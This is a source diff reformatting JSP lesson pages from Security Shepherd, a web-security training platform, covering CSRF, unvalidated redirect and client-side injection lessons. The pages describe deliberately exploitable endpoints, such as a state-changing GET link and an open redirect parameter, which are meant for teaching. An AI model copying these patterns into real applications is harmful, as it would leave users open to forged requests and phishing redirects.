+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 *
+	 * @author Mark Denihan
+	 */
 
-    final String LEVEL_NAME = "CSRF Lesson";
-    final String LEVEL_HASH = "ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7";
+	final String LEVEL_NAME = "CSRF Lesson";
+	final String LEVEL_HASH = "ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.csrf." + LEVEL_HASH, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.csrf");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.csrf." + LEVEL_HASH, locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.csrf");
 
-    ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
-    String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
-    String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.csrf");
+	ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+	String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
+	String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+	String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.csrf");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+	if (request.getSession() != null)
+	{
+	    HttpSession ses = request.getSession();
+	    //Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+			//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            // Getting Session Variables
-            String hex = (String) ses.getAttribute("userName");
-            String falseId = new Integer(hex.getBytes().hashCode() + hex.substring(0, hex.length() / 2).hashCode()).toString();
-            ses.setAttribute("falseId", falseId);
+			String csrfToken = Encode.forHtml(tokenCookie.getValue());
+			// Getting Session Variables
+			String hex = (String) ses.getAttribute("userName");
+			String falseId = new Integer(hex.getBytes().hashCode() + hex.substring(0, hex.length() / 2).hashCode()).toString();
+			ses.setAttribute("falseId", falseId);
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info2") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info3") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info4") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info5") %>
-        <br/> <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            CSRF
-        </a> <br/> <br/> <input type="button"
-                                value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/> <br/>
-    <%= bundle.getString("paragraph.info6") %>
-    <br/> <br/> GET <a
-        href="<%= Encode.forHtml("../root/grantComplete/csrfLesson?userId=exampleId") %>">/root/grantComplete/csrfLesson?userId=exampleId
-</a> <br/>
-    <%= bundle.getString("paragraph.info7") %>: <a><%= falseId %>
-</a> <br/>
-    <br/> <br/>
-    <h2 class="title"><%= bundle.getString("challenge.title") %>
-    </h2>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.description") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="messageForAdmin"
-                           type="text"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("button.sendMessage") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("generic.loading") %>...
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info2") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info3") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info4") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info5") %>
+			<br /> <br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				CSRF
+			</a> <br /> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br /> <br />
+		<%= bundle.getString("paragraph.info6") %>
+		<br /> <br /> GET <a
+			href="<%= Encode.forHtml("../root/grantComplete/csrfLesson?userId=exampleId") %>">/root/grantComplete/csrfLesson?userId=exampleId
+		</a> <br />
+		<%= bundle.getString("paragraph.info7") %>: <a><%= falseId %></a> <br />
+		<br /> <br />
+		<h2 class="title"><%= bundle.getString("challenge.title") %></h2>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.description") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="messageForAdmin"
+						type="text" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("button.sendMessage") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("generic.loading") %>...
+						</p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theMessageForAdmin = $("#messageForAdmin").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= LEVEL_HASH %>",
-                data: {
-                    messageForAdmin: theMessageForAdmin,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("generic.error") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theMessageForAdmin = $("#messageForAdmin").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= LEVEL_HASH %>",
+						data: {
+							messageForAdmin: theMessageForAdmin,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("generic.error") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
 
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
 
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.jsp b/src/main/webapp/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.jsp
index 7a229658b..0b1106c37 100644
--- a/src/main/webapp/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.jsp
+++ b/src/main/webapp/lessons/f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f.jsp
@@ -1,188 +1,196 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    /**
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     */
+	/**
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 */
 
-    final String LEVEL_NAME = "Unvalidated Redirects and Forwards Lesson";
-    final String LEVEL_HASH = "f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f";
+	final String LEVEL_NAME = "Unvalidated Redirects and Forwards Lesson";
+	final String LEVEL_HASH = "f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f";
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.unvalidated_redirects_forwards." + LEVEL_HASH, locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.unvalidated_redirects_forwards");
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.unvalidated_redirects_forwards." + LEVEL_HASH, locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.unvalidated_redirects_forwards");
 
-    ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
-    String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
-    String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
-    String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.defend.unvalidatedRedirectsAndForwards");
+	ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+	String owaspMoreInfo = 	generic.getString("module.generic.owasp.more.info");
+	String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+	String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.defend.unvalidatedRedirectsAndForwards");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+	if (request.getSession() != null)
+	 {
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+			//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String hex = (String) ses.getAttribute("userName");
-            String tempId = new Integer(hex.getBytes().hashCode() + hex.substring(0, hex.length() / 2).hashCode()).toString();
-            ses.setAttribute("tempId", tempId);
+			String csrfToken = Encode.forHtml(tokenCookie.getValue());
+			String hex = (String) ses.getAttribute("userName");
+			String tempId = new Integer(hex.getBytes().hashCode() + hex.substring(0, hex.length() / 2).hashCode()).toString();
+			ses.setAttribute("tempId", tempId);
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= translatedLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= translatedLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= translatedLevelName %>
-    </h2>
-    <p>
-    <div id="lessonIntro">
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.2") %>
-        <br/> <br/>
-        <%= bundle.getString("paragraph.info.3") %>
-        <br/> <br/>
-        <%= owaspMoreInfo %>
-        <a href="<%= owaspUrlAttack %>" target="_blank"><%= owaspGuideTo %>
-            Unvalidated Redirects and Forwards
-        </a> <br/> <br/> <input type="button"
-                                value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson"/>
-    </div>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= translatedLevelName %></h2>
+		<p>
+		<div id="lessonIntro">
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.2") %>
+			<br /> <br />
+			<%= bundle.getString("paragraph.info.3") %>
+			<br /> <br />
+			<%= owaspMoreInfo %>
+			<a href="<%= owaspUrlAttack %>" target="_blank"> <%= owaspGuideTo %>
+				Unvalidated Redirects and Forwards
+			</a> <br /> <br /> <input type="button"
+				value="<%= bundle.getString("button.hideIntro") %>" id="hideLesson" />
+		</div>
 
-    <input type="button"
-           value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
-           style="display: none;"/> <br/> <br/>
-    <%= bundle.getString("challenge.description") %>
-    <br/> <br/>
-    <%= bundle.getString("challenge.description.function") %>
-    <a href="../user/redirect?to=exampleUrl">/user/redirect?to=exampleUrl</a>
-    <br/> <br/>
-    <%= bundle.getString("challenge.description.request") %>
-    <a
-            href="../root/grantComplete/unvalidatedredirectlesson?userid=exampleId">/root/grantComplete/unvalidatedredirectlesson?userid=exampleId</a>
-    <%= bundle.getString("challenge.description.request.2") %>
-    <br/> <br/>
-    <%= bundle.getString("challenge.description.id") %>
-    <a><%= tempId %>
-    </a> <br/> <br/>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("challenge.description.admin.message") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input type="input" type="text" id="theURL"
-                           style="width: 600px;"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("send.message.button") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading")%>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+		<input type="button"
+			value="<%= bundle.getString("button.showIntro") %>" id="showLesson"
+			style="display: none;" /> <br /> <br />
+		<%= bundle.getString("challenge.description") %>
+		<br /> <br />
+		<%= bundle.getString("challenge.description.function") %>
+		<a href="../user/redirect?to=exampleUrl">/user/redirect?to=exampleUrl</a>
+		<br /> <br />
+		<%= bundle.getString("challenge.description.request") %>
+		<a
+			href="../root/grantComplete/unvalidatedredirectlesson?userid=exampleId">/root/grantComplete/unvalidatedredirectlesson?userid=exampleId</a>
+		<%= bundle.getString("challenge.description.request.2") %>
+		<br /> <br />
+		<%= bundle.getString("challenge.description.id") %>
+		<a><%= tempId %></a> <br /> <br />
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("challenge.description.admin.message") %>
+					</td>
+				</tr>
+				<tr>
+					<td><input type="input" type="text" id="theURL"
+						style="width: 600px;" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("send.message.button") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("word.info.loading")%></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theMessageForAdmin = $("#theURL").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f",
-                data: {
-                    messageForAdmin: theMessageForAdmin,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("generic.error") %> " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theMessageForAdmin = $("#theURL").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "f15f2766c971e16e68aa26043e6016a0a7f6879283c873d9476a8e7e94ea736f",
+						data: {
+							messageForAdmin: theMessageForAdmin,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("generic.error") %> " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
 
-    $('#hideLesson').click(function () {
-        $("#lessonIntro").hide("slow", function () {
-            $("#showLesson").show("fast");
-        });
-    });
+			$('#hideLesson').click(function(){
+				$("#lessonIntro").hide("slow", function(){
+					$("#showLesson").show("fast");
+				});
+			});
 
-    $("#showLesson").click(function () {
-        $('#showLesson').hide("fast", function () {
-            $("#lessonIntro").show("slow");
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+			$("#showLesson").click(function(){
+				$('#showLesson').hide("fast", function(){
+					$("#lessonIntro").show("slow");
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/lessons/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.jsp b/src/main/webapp/lessons/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.jsp
index 3ac198a62..ec38061c9 100644
--- a/src/main/webapp/lessons/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.jsp
+++ b/src/main/webapp/lessons/f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1.jsp
@@ -1,120 +1,127 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 
 <%
-    //No Quotes In level Name
-    String levelName = "Client Side Injection Lesson";
-    //Alphanumeric Only
-    String levelHash = "f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1";
+	//No Quotes In level Name
+	String levelName = "Client Side Injection Lesson";
+	//Alphanumeric Only
+	String levelHash = "f758a97011ec4452cc0707e546a7c0f68abc6ef2ab747ea87e0892767152eae1";
+	
+	//Translation Stuff
+	Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+	ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_client_side_injection." + levelHash, locale);
+	ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+	//Used more than once translations
+	String translatedLevelName = bundle.getString("title.question.csi");
 
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.m_client_side_injection." + levelHash, locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
-    //Used more than once translations
-    String translatedLevelName = bundle.getString("title.question.csi");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+	if (request.getSession() != null)
+	{
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try
+		{
+			tokenCookie = Validate.getToken(request.getCookies());
+		}
+		catch(Exception htmlE)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// If tokenCookie == null, then the page is not going to continue loading
+		if (Validate.validateSession(ses) && tokenCookie != null)
+		{
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-
-            /*
-             * <br/><br/>
-             * This file is part of the Security Shepherd Project.
-             *
-             * The Security Shepherd project is free software: you can redistribute it and/or modify
-             * it under the terms of the GNU General Public License as published by
-             * the Free Software Foundation, either version 3 of the License, or
-             * (at your option) any later version.<br/>
-             *
-             * The Security Shepherd project is distributed in the hope that it will be useful,
-             * but WITHOUT ANY WARRANTY; without even the implied warranty of
-             * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-             * GNU General Public License for more details.<br/>
-             *
-             * You should have received a copy of the GNU General Public License
